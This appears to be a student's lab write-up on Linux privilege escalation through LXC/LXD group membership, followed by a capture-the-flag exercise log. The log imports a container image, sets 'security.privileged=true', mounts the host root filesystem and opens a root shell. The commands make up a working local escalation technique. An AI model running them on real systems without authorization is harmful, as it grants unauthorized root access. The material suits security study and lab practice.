# Intro - For context, containers operate at the operating system level and virtual machines at the hardware level - Thus, containers thus share an OS but isolate sets of one or more apps # Linux Containers - `LXC` is an OS-level virtualization technique that allows multiple Linux systems to run in isolation from each other on a single host by owning their own processes but sharing the host system kernel - The usage of `LXC`, an almost all-encompassing ecosystem, and innovative associated tools are primarily due to the Docker platform, which established Linux containers - The entire setup, from creating container templates and deploying them, configuring the operating system and networking, to deploying applications, remains the same # Linux Daemon - [LXD](https://github.com/lxc/lxd) is similar to LXC in some respects but is designed to contain a complete OS - Thus it is not an application container but a system container - Before we can use this service to privesc, we must be in either the `lxc` or `lxd` group - We can enum this with the `id` command - Assuming we are a member of the `lxd` group, there are several ways in which we can exploit `LXC`/`LXD` - We can either (a) create our own container and transfer it to the target system or (b) use an existing container - Unfortunately, admin often use templates that have little to no security - Let's check out existing containers ```bash cd ContainerImages ls ubuntu-template.tar.xz ``` - Templates often do not have passwords, especially if they are uncomplicated test environments - If we are a little lucky and there is such a container on the system, it can be exploited - For this, we need to import this container as an image ```bash lxc image import ubuntu-template.tar.xz --alias ubuntutemp lxc image list ``` - After verifying that this image has been successfully imported, we can initiate the image and configure it by specifying the `security.privileged` flag and the root path for the container - This flag disables all isolation features that allow us to act on the host ```bash lxc init ubuntutemp privesc -c security.privileged=true lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true ``` - Now, we can start the container and log into it. In the container, we can then go to the path we specified to access the `resource` of the host system as `root` ```bash lxc start privesc lxc exec privesc /bin/bash root@nix02:~# ls -l /mnt/root ``` --- # Exercise - `ping` test ![[images/Pasted image 20260208194924.png]] - `nmap` scans ![[images/Pasted image 20260208195029.png]] - `ssh` into box with given creds ![[images/Pasted image 20260208195057.png]] - light internal enum ![[images/Pasted image 20260208195140.png]] - enum lxc+lxd ![[images/Pasted image 20260208195214.png]] - we have access to an alpine image - import alpine and list ![[images/Pasted image 20260208195334.png]] - NOTE: misnamed the alias as `ubuntutemp` - initialize image with `security.privileged=true` flag and configure to mount local `/root` dir ```bash lxc init ubuntutemp privesc -c security.privileged=true lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true ``` ![[images/Pasted image 20260208195532.png]] - Now, let's start the container and open an interactive shell thereto ```bash lxc start privesc lxc exec privesc /bin/bash ``` - Getting an error when we go to spawn an interactive `bash` shell ![[images/Pasted image 20260208195839.png]] - Let's try an `sh` shell instead > we're in! ![[images/Pasted image 20260208195904.png]] - now let's find the flag - not in `/root` ![[images/Pasted image 20260208200053.png]] - let's search the disk > there it is! ![[images/Pasted image 20260208200111.png]]